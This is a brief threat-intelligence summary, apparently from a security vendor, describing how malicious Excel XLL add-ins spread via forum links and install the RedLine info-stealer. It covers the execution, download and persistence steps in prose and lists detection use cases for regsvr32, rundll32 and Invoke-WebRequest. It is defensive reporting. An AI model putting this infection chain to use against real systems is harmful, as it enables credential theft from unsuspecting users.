Microsoft Excel (XLL) Leads to RedLine Info-Stealer

Industry: N/A | Level: Tactical | Source: BleepingComputer

Threat Actors are utilizing public discussion forums, or article comment systems, to spread malicious Excel documents that ultimately download and install RedLine information stealer. Malicious links are hosted on Google Drive and download a XLL which BleepingComputer describes as, "an an add-in that allows developers to extend the functionality of Excel by reading and writing data, importing data from other sources, or creating custom functions to perform various tasks. XLL files are simply a DLL file that includes an 'xlAutoOpen' function executed by Microsoft Excel when the add-in is opened." While tests have had unsuccessful executions, potentially due to incompatible versions of Microsoft Excel, the sequence appears to involve the DLL being executed with regsvr32 or rundll32 that extracts the wget.exe program to download the RedLine binary saving it as %UserProfile%\JavaBridge32.exe. Once downloaded an autorun registry entry will launch and enable persistence for the malware.

• Anvilogic Scenario: Malicious Document Delivering Malware
• Anvilogic Use Cases:
• regsvr32 Execution
• Rundll32 Command Line
• Invoke-WebRequest Command